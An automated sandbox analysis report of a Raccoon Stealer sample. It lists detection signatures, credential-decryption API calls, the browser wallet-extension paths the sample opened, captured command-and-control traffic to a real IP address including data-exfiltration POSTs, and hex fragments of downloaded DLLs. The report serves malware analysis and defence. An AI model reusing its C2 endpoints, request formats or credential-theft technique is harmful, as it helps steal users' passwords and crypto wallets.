Windows Analysis Report eLZzxG56uH.exe

Overview

General Information

Sample Name: eLZzxG56uH.exe
Analysis ID: 491991
MD5: 82f7734fef8ee0789cf270f292651cbe
SHA1: 80db9b3c72f88b3cacb40362ee21baa2390de38c
SHA256: 9d8f04bd64b81ed3367def9f74a8a98e9a868f30db9433a9ef37b481394c9046
Tags: exe, RaccoonStealer

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Raccoon Stealer
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to steal Internet Explorer form passwords
Machine Learning detection for sample
Self deletion via cmd delete
Tries to detect virtualization through RDTSC time measurements
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Binary contains a suspicious time stamp
PE file contains more sections than normal
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: eLZzxG56uH.exe Virustotal: Detection: 23%
Source: eLZzxG56uH.exe ReversingLabs: Detection: 22%
Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR
Machine Learning detection for sample
Source: eLZzxG56uH.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001EA130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 0_2_001EA130
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001E9F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 0_2_001E9F5D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F4A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 0_2_001F4A5F
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001E0F09 __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot, 0_2_001E0F09

Compliance:

Uses 32bit PE files
Source: eLZzxG56uH.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: eLZzxG56uH.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001FEFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_001FEFDD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49744 -> 185.138.164.150:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DEPTELECOMNSO-ASRU DEPTELECOMNSO-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /tika31ramencomp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 54992Host: 185.138.164.150
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.138.164.150 185.138.164.150
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 06:53:34 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 06:53:37 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc 
ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150 (50 identical entries)
Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp String found in binary or memory: http://185.138.164.150/
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f
Source: eLZzxG56uH.exe, 00000000.00000003.311477945.0000000001738000.00000004.00000001.sdmp String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f.te
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: http://185.138.164.150/D
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp String found in binary or memory: http://185.138.164.150/w
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp String found in binary or memory: http://185.138.164.150/~
Source: eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp String found in binary or memory: http://185.138.164.150:80//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6fiimedpic
Source: eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp String found in binary or memory: http://185.138.164.150:80/F2FB95FBD9F1696ome
Source: qipcap.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: qipcap.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp, nssckbi.dll.0.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: qipcap.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: qipcap.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: qipcap.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: qipcap.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: qipcap.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://ocsp.accv.es0
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://repository.swisssign.com/0
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
